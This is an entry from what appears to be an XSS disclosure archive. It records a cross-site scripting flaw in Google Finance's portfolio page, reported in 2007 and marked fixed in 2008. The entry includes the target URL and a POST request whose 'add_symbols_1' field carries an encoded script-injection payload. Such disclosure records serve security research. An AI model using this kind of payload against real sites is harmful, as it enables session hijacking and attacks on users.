Home | News | Articles | Adv. | Submit | Alerts | Links | XSS info | About | Contact

XSS Archive | XSS Archive | TOP Submitters | TOP Submitters | TOP Pagerank |

Date submitted: 03/12/2007 Date published: 03/12/2007 Date fixed: 12/11/2008 Status:  FIXED Author: Fugitif Domain: finance.google.com Category: XSS Pagerank: 2 URL: http://finance.google.com/finance/portfolio?action=add&hash=0bdb25b244bb4501 POST: pid=1&editmode=basic&add_symbols_1=%27%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E&add_ttype_1=BUY& add_date_1=&add_shares_1=&add_price_1=&add_commission_1=&add_notes_1= Additional information: Requires authentication, and requires the attacker to guess or retrieve the 'hash' parameter, or to force the user into inserting malicious data into the 'Symbol' input box Click here to view the mirror

Home | News | Articles | Advisories | Submit | Alerts | Links | What is XSS | About | Contact | Some Rights Reserved.